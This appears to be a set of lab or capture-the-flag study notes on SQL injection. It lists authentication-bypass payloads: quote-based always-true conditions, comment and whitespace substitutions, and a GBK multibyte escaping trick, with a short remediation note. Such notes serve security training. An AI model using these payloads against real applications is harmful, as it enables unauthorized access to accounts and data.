___________________________________________________________________

sql injection
___________________________________________________________________

there are three different ways to echo information in a sql statement:

    using quotes: single quote or double quote.
    using back-ticks.
    directly.

the way information is echoed back, and even what separator is used, will decide the detection technique to use. however, you don't have this information, and you will need to try to guess it.

you will need to formulate hypotheses and try to verify them. that's why spending time poking around with these examples is so important.
___________________________________________________________________

#1

single quotes

' or 1=1 -- [space]
' or 1=1#
___________________________________________________________________

#2

double quotes

" or 1=1 -- [space]
___________________________________________________________________

#3

if multiple rows, considered invalid

' or 1=1 limit 1 -- 
___________________________________________________________________

#4 & #5

spaces are not allowed

'/**/or/**/1=1#

examples: (url encode within the proxy)
/**/ %00 %09 %0a %0d
___________________________________________________________________

#6

(*)(url encode within the proxy, otherwise it gets double encoded)
%bf%27 or 1=1 --

using the string \xbf' (url-encoded as %bf%27), it's possible to get a single quote that will not get escaped properly. it's therefore possible to inject an always-true condition using %bf%27 or 1=1 -- and bypass the authentication.

as a side note, this issue can be remediated by setting up the connection encoding to 'GBK' instead of using an SQL query (which is the source of this issue). here the problem comes from the execution of the following query:

SET CHARACTER SET 'GBK';

it is a pretty unlikely issue for a web application but it's always good to know that it exists, especially if you play CTFs.
___________________________________________________________________
